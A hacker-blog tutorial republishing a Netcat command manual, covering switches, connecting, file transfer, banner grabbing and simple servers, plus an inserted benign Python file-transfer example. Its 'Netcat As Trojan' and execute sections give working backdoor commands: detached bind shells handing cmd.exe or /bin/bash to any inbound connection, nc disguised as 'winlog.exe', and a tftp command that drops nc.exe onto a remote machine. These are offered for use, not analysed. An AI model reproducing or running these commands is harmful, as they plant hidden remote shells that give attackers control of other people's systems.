NETCAT MANUAL | COMMANDS

Hello GreenHackers...
In this article we'll discuss Netcat commands and their use. Those who don't know about Netcat should first read my previous post, NETCAT | BEGINNER GUIDE.


Okay So Let's Start..

Important Switches

  • -d          detach from console, stealth mode
  • -e prog     inbound program to exec [dangerous!!]
  • -g          source-routing hop point[s], up to 8
  • -G num      source-routing pointer: 4, 8, 12, ...
  • -i secs     delay interval for lines sent, ports scanned
  • -l          listen mode, for inbound connects
  • -L          listen harder, re-listen on socket close
  • -n          numeric-only IP addresses, no DNS
  • -o file     hex dump of traffic
  • -p port     local port number
  • -r          randomize local and remote ports
  • -s addr     local source address
  • -t          answer TELNET negotiation
  • -u          UDP mode
  • -v          verbose [use twice to be more verbose]
  • -w secs     timeout for connects and final net reads
  • -z          zero-I/O mode [used for scanning]
Netcat Connecting

Run nc in connect mode and connect to port 139 (here -p 31337 sets the local source port):
nc -p 31337 127.0.0.1 139

Run nc in connect mode and connect to port 139 with verbose display; giving -v twice makes the output more verbose:
nc -v -v -p 31337 127.0.0.1 139

Run nc in connect mode and connect to port 139 with the timeout set to 5 seconds:
nc -w 5 -p 31337 127.0.0.1 139


Run nc in connect mode and connect to port 139 with the timeout set to 5 seconds and verbose display:
nc -v -v -w 5 -p 31337 127.0.0.1 139


Netcat Execute

-e executes a program on an inbound connection, but only if netcat was compiled with -DGAPING_SECURITY_HOLE.

The Windows build nc.exe is compiled with this option, so -e works there.

Example

nc -l -d -p 10000 -e cmd.exe or

nc -L -d -p 10000 -e cmd.exe

This runs nc detached from the console, listening on port 10000 and handing every inbound connection to cmd.exe.


Netcat Listen
Use the -L switch to re-listen after a client disconnects.
This way you can connect over and over to the same Netcat process.

Example:

nc -l -p 53 -t -e cmd.exe

nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'

Netcat File Sending
To receive a file named newfile on the destination system, start netcat with the following command:
nc -l -p 1234 > newfile


On the source system, send a file named newfile to the destination system with the following command:

nc destinationIP 1234 < newfile
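A Python re-implementation of the receive/send pair above, added here as an example (it is not code from the original post). It runs both ends on loopback and adds the check a plain nc transfer never performs: comparing SHA-256 of both copies, since nc gives no signal that the received file is complete or unaltered. The `demo()` helper and its sample payload are constructed for illustration.

```python
import hashlib
import socket
import tempfile
import threading
from pathlib import Path


def receive_file(srv: socket.socket, dest: Path) -> None:
    """Equivalent of `nc -l -p PORT > dest`: accept one connection and
    write everything received until the sender closes the socket."""
    with srv:
        conn, _ = srv.accept()
        with conn, dest.open("wb") as out:
            while chunk := conn.recv(65536):  # b"" means the peer closed
                out.write(chunk)


def send_file(host: str, port: int, src: Path) -> None:
    """Equivalent of `nc HOST PORT < src`: stream the file, then shut down
    the write side. That close is the receiver's only end-of-file marker."""
    with socket.create_connection((host, port)) as sock, src.open("rb") as f:
        sock.sendfile(f)
        sock.shutdown(socket.SHUT_WR)


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def transfer(src: Path, dest: Path) -> tuple[str, str]:
    """Run receiver and sender on 127.0.0.1; return (sent hash, received hash)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    receiver = threading.Thread(target=receive_file, args=(srv, dest))
    receiver.start()
    send_file("127.0.0.1", port, src)
    receiver.join()
    return sha256_of(src), sha256_of(dest)


def demo() -> tuple[str, str]:
    """Transfer a constructed sample file and return both hashes for comparison."""
    workdir = Path(tempfile.mkdtemp())
    src = workdir / "newfile"
    src.write_bytes(b"constructed sample line\n" * 4096)  # ~96 KiB, several recv() calls
    return transfer(src, workdir / "received")


if __name__ == "__main__":
    sent, received = demo()
    print("match" if sent == received else "MISMATCH", sent)
```

Only the hash comparison tells you the transfer was complete; nc itself exits silently on a dropped connection.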

Netcat Banner Grabbing

nc -vvn hostIP 80

nc -vvn hostIP 8080

Once connected, type HEAD / HTTP/1.0 and hit enter twice.

nc -v www.website.com 80 < get.txt
Checking the web server's headers.

Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (just hit ENTER in your text editor)
[Carriage]
In Perl you can use print $socket "GET / HTTP/1.0\n\n";


echo "blahblahblah" | nc hostIP 80 > default.htm

cat get.txt | nc hostIP 80


Netcat Web Banner Grabber

The first file is a text file:

----begin get.txt-----
GET / HTTP/1.0
(blank line: hit ENTER in your editor)
(blank line: hit ENTER in your editor)
-----end get.txt-----



The second file is a batch file:

-----begin getweb.cmd-----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
-----end getweb.cmd-----

You run it like this: getweb.cmd www.someweb.com


Netcat Finger & Telnet

Netcat as a simple finger client:

nc -v hostIP 79 < user.txt
The file "user.txt" contains the username you are interested in.

You can also send the output to a log file.

nc -v hostIP 79 < user.txt > log.txt

Run nc in listen mode on port 23, detached from the console, and answer Telnet negotiation:
nc -v -v -L -d -t 127.0.0.1 -p 23

Netcat Simple Server

To create a simple server

nc -l -p 1234 < file

A very simple web server

nc -L -d -p 80 < file

A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe

Netcat As Trojan

We will use the -t switch to answer telnet negotiation. Netcat should be compiled with the -DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/or nc -L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note: winlog.exe = nc.exe)

Connect to your trojan using

nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe    Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe    Netcat listening on port 23.
To send netcat to a remote box using tftp:
tftp -i remoteip GET nc.exe

These are just some Netcat commands to show the power and versatility of Netcat. I found this article on the web; it was written by Adonis a.k.a. NtWaK0.

Enjoy Friends With NETCAT.... @@@@@@@